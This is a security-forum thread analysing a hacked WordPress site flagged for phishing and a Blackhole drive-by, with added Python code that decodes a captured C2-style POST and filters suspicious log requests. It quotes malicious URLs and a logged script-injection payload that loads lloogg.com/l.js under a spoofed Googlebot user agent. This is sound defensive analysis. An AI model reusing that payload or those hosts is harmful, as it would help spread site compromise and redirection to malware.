Phishing detected and Drive-by Blackhole on site...avast detects..

Good that the site is being alerted by Google Safebrowsing as a Phishing site: htxp://ftp.aziatische-ingredienten.nl/Dc16FpsG/index.html.
One day ago we had this urlquery scan: http://urlquery.net/report.php?id=122720
Variety of Blackhole = EXP/JS.Blacole.BI and status = active since 2012-08-08 21:11:22 which avast will detect as JS:Redirector-RO [Trj]
Site is vulnerable via WP, WordPress version: WordPress 3.4.1
Wordpress version from source: 3.4.1
Wordpress Version 3.3 or 3.4 based on: htxp://ftp.aziatische-ingredienten.nl//wp-includes/js/autosave.js
WordPress theme: htxp://www.aziatische-ingredienten.nl/wp-content/themes/2010-weaver/
see:/^(htxp(s)?://)?ftp.aziatische-ingredienten.nl/
And from two days ago we have this ThreatExpert report: http://webcache.googleusercontent.com/search?q=cache:vxZvzj3H-7wJ:www.threatexpert.com/report.aspx%3Fmd5%3D54e4086d370ad757a647fa16ce05c0cd+/^(http(s)%3F:\/\/)%3Fftp.aziatische-ingredienten.nl/&cd=6&hl=nl&ct=clnk&gl=nl
About the poor reputation of the site: http://www.mywot.com/en/scorecard/ftp.aziatische-ingredienten.nl
info: [script] stats.wordpress dot com/e-201232.js
info: [decodingLevel=0] found JavaScript
suspicious: (cookie dependent)

polonus

Hi Polonus,

See:

00000000 | 504F 5354 202F 666F 7275 6D2F 7669 6577 | POST /forum/view
00000010 | 746F 7069 632E 7068 7020 4854 5450 2F31 | topic.php HTTP/1
00000020 | 2E30 0D0A 486F 7374 3A20 3636 2E35 352E | .0..Host: 66.55.
00000030 | 3839 2E31 3438 0D0A 4163 6365 7074 3A20 | 89.148..Accept:
00000040 | 2A2F 2A0D 0A41 6363 6570 742D 456E 636F | */*..Accept-Enco
00000050 | 6469 6E67 3A20 6964 656E 7469 7479 2C20 | ding: identity,
00000060 | 2A3B 713D 300D 0A43 6F6E 7465 6E74 2D4C | *;q=0..Content-L
00000070 | 656E 6774 683A 2034 3536 0D0A 436F 6E6E | ength: 456..Conn
00000080 | 6563 7469 6F6E 3A20 636C 6F73 650D 0A43 | ection: close..C
00000090 | 6F6E 7465 6E74 2D54 7970 653A 2061 7070 | ontent-Type: app
000000A0 | 6C69 6361 7469 6F6E 2F6F 6374 6574 2D73 | lication/octet-s
000000B0 | 7472 6561 6D0D 0A43 6F6E 7465 6E74 2D45 | tream..Content-E
000000C0 | 6E63 6F64 696E 673A 2062 696E 6172 790D | ncoding: binary.
000000D0 | 0A55 7365 722D 4167 656E 743A 204D 6F7A | .User-Agent: Moz
000000E0 | 696C 6C61 2F34 2E30 2028 636F 6D70 6174 | illa/4.0 (compat
000000F0 | 6962 6C65 3B20 4D53 4945 2035 2E30 3B20 | ible; MSIE 5.0;
00000100 | 5769 6E64 6F77 7320 3938 290D 0A0D 0A43 | Windows 98)....C

Which can be shortened to this:
hXtp://66.55.89.148/forum/viewtopic.php

Notice the “application/octet-stream” and “Content-Encoding: binary”

Same url mentioned here:
http://webcache.googleusercontent.com/search?q=cache:VU3unpZszJEJ:www.threatexpert.com/report.aspx%3Fmd5%3D7437f140e46e7b8c10acb7855dad7eca+&cd=1&hl=en&ct=clnk&gl=us

Likely associated with different returns. Check my PM.

~!Donovan
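To show what a defender can pull out of a capture like the one in the post above, here is an added Python example (not part of !Donovan's post and not from any tool the thread mentions). It re-types the posted hex dump as constructed input, rebuilds the HTTP request from the hex column, and flags the indicators the post points at (the octet-stream POST to a PHP script, Content-Encoding: binary, the obsolete User-Agent) plus the bare-IP Host header. The indicator rules, the function names and the hxxp defanging of the shortened URL are my assumptions; the dump itself is copied from the post.

```python
import re
from dataclasses import dataclass

# Constructed sample input: the hex dump quoted in the post above, re-typed
# here verbatim. Only the middle (hex) column is decoded; the ASCII column
# is kept for readability.
HEXDUMP = """\
00000000 | 504F 5354 202F 666F 7275 6D2F 7669 6577 | POST /forum/view
00000010 | 746F 7069 632E 7068 7020 4854 5450 2F31 | topic.php HTTP/1
00000020 | 2E30 0D0A 486F 7374 3A20 3636 2E35 352E | .0..Host: 66.55.
00000030 | 3839 2E31 3438 0D0A 4163 6365 7074 3A20 | 89.148..Accept:
00000040 | 2A2F 2A0D 0A41 6363 6570 742D 456E 636F | */*..Accept-Enco
00000050 | 6469 6E67 3A20 6964 656E 7469 7479 2C20 | ding: identity,
00000060 | 2A3B 713D 300D 0A43 6F6E 7465 6E74 2D4C | *;q=0..Content-L
00000070 | 656E 6774 683A 2034 3536 0D0A 436F 6E6E | ength: 456..Conn
00000080 | 6563 7469 6F6E 3A20 636C 6F73 650D 0A43 | ection: close..C
00000090 | 6F6E 7465 6E74 2D54 7970 653A 2061 7070 | ontent-Type: app
000000A0 | 6C69 6361 7469 6F6E 2F6F 6374 6574 2D73 | lication/octet-s
000000B0 | 7472 6561 6D0D 0A43 6F6E 7465 6E74 2D45 | tream..Content-E
000000C0 | 6E63 6F64 696E 673A 2062 696E 6172 790D | ncoding: binary.
000000D0 | 0A55 7365 722D 4167 656E 743A 204D 6F7A | .User-Agent: Moz
000000E0 | 696C 6C61 2F34 2E30 2028 636F 6D70 6174 | illa/4.0 (compat
000000F0 | 6962 6C65 3B20 4D53 4945 2035 2E30 3B20 | ible; MSIE 5.0;
00000100 | 5769 6E64 6F77 7320 3938 290D 0A0D 0A43 | Windows 98)....C
"""


def hexdump_to_bytes(dump: str) -> bytes:
    """Decode the hex column of an 'offset | hex | ascii' dump into raw bytes."""
    out = bytearray()
    for line in dump.splitlines():
        parts = line.split("|")
        if len(parts) < 2:
            continue  # skip blank or malformed lines
        out += bytes.fromhex(parts[1].replace(" ", ""))
    return bytes(out)


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: dict   # header names lower-cased
    body: bytes     # whatever followed the blank line in the capture


def parse_request(raw: bytes) -> HttpRequest:
    """Split an HTTP/1.x request into request line, headers and body."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers, body)


def suspicious_indicators(req: HttpRequest) -> list:
    """Heuristics (assumed, not from the post) that a triage script could apply."""
    findings = []
    ctype = req.headers.get("content-type", "")
    cenc = req.headers.get("content-encoding", "")
    ua = req.headers.get("user-agent", "")
    host = req.headers.get("host", "")
    if req.method == "POST" and req.target.endswith(".php") and ctype == "application/octet-stream":
        findings.append("binary (octet-stream) POST body sent to a PHP script")
    if cenc == "binary":
        findings.append("Content-Encoding: binary on a request (browsers do not send this)")
    if re.search(r"MSIE [1-6]\.|Windows 98", ua):
        findings.append("obsolete browser User-Agent: " + ua)
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        findings.append("Host header is a bare IP address, not a hostname")
    return findings


def defanged_url(req: HttpRequest) -> str:
    """Shortened form of the request, defanged with hxxp like the thread does."""
    return "hxxp://" + req.headers.get("host", "") + req.target


if __name__ == "__main__":
    request = parse_request(hexdump_to_bytes(HEXDUMP))
    print(defanged_url(request))
    for finding in suspicious_indicators(request):
        print(" -", finding)
```

The capture ends one byte into the body (the trailing `C`), so `body` only shows that the 456-byte binary payload begins right after the headers; a full capture would let the same parser hand the body to a file-type check.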

Hi !Donovan,

Very valuable observations, my friend. Here is something more about the method by which this manipulation is being wrought.

Yes, in fileviewer the location line in the header above has redirected the request to: htxp://genlarklin.com/
Alert found: //** Is your rel canonical tag pointing to another domain? WordPress issues on site…

EDIT Uri → htxp://genlarklin.com/xmlrpc.php?rsd → htxp://archipelago.phrasewise.com/rsd" (rsd version) + htxp://lloogg.com/l.js?c=131000824105e38
(this is in the path for Service Setting from Real Simple Discoverability) to Nullege a Framework Package used in the
so-called MoreOverbot hack attempt - analysis → example of googlebot manipulation:

GET /scriptdocument.write(unescape(%3Cscript%3Elloogg_clientid=%22211000209487386f%22%3C/script%3E%3Cscript%20src=%22htxp://lloogg.com/l.js%22%3E%3C/script%3E));/script HTTP/1.1" 301 5 “-” “Mozilla/5.0 (compatible; Googlebot/2.1; +htxp://www.google.com/bot.html)”

The application scripts will then deny requests with invalid characters in the query, and this, as you said, could give rise to manipulation in the hands of the attackers.

polonus
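As an added example of the server-side check polonus describes (denying requests whose query or path carries invalid characters), here is Python code that is not part of polonus's post or of WordPress. It parses two constructed Apache combined-format log lines, the first carrying the request target from the post above and a User-Agent claiming to be Googlebot, the second a benign forum request, and reports for each whether the request would be denied and why. The client IPs and timestamps are constructed documentation values, the allowed-character policy and function names are my assumptions, and URLs are defanged with hxxp as the thread does.

```python
import re
from urllib.parse import unquote

# Constructed sample log (Apache combined format). Line 1 reuses the request
# target and User-Agent quoted in the post above; line 2 is a normal request.
# IPs are from the documentation ranges; timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Aug/2012:21:11:22 +0200] "GET /scriptdocument.write(unescape(%3Cscript%3Elloogg_clientid=%22211000209487386f%22%3C/script%3E%3Cscript%20src=%22hxxp://lloogg.com/l.js%22%3E%3C/script%3E));/script HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +hxxp://www.google.com/bot.html)"
198.51.100.7 - - [08/Aug/2012:21:12:03 +0200] "GET /forum/viewtopic.php?t=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/14.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed policy: RFC 3986 unreserved characters plus the delimiters a
# path/query legitimately needs. Anything else in the *raw* target is denied.
ALLOWED = re.compile(r"^[A-Za-z0-9\-._~/?=&%+]*$")

# Markers checked on the *decoded* target, so %3Cscript%3E does not slip past.
INJECTION = re.compile(r"<\s*script|document\.write|javascript:", re.I)


def parse_combined(line: str):
    """Return the fields of one combined-format log line, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_request(target: str):
    """Return (allowed, reasons) for a raw request target as seen in the log."""
    reasons = []
    if not ALLOWED.match(target):
        reasons.append("raw target contains characters outside the allowed set")
    if INJECTION.search(unquote(target)):
        reasons.append("decoded target contains script-injection markers")
    return (not reasons, reasons)


def triage_log(text: str):
    """Apply check_request to each log line and note self-declared crawler UAs."""
    rows = []
    for line in text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        allowed, reasons = check_request(rec["target"])
        rows.append({
            "ip": rec["ip"],
            "target": rec["target"][:60],
            "allowed": allowed,
            "reasons": reasons,
            # The UA string is client-controlled; a Googlebot claim is only a
            # hint to verify the source IP by reverse DNS, never proof.
            "claims_googlebot": "Googlebot" in rec["ua"],
        })
    return rows


if __name__ == "__main__":
    for row in triage_log(SAMPLE_LOG):
        verdict = "allow" if row["allowed"] else "deny"
        print(f'{row["ip"]:<14} {verdict:<5} googlebot-claim={row["claims_googlebot"]} {row["target"]}')
        for reason in row["reasons"]:
            print("   -", reason)
```

The two checks are deliberately separate: the raw-character filter is the cheap gate the application can apply before any decoding, and the decoded-marker check catches percent-encoded payloads that the character filter alone would admit (a target such as `/index.php?q=%3Cscript%3E` passes the first check and fails the second).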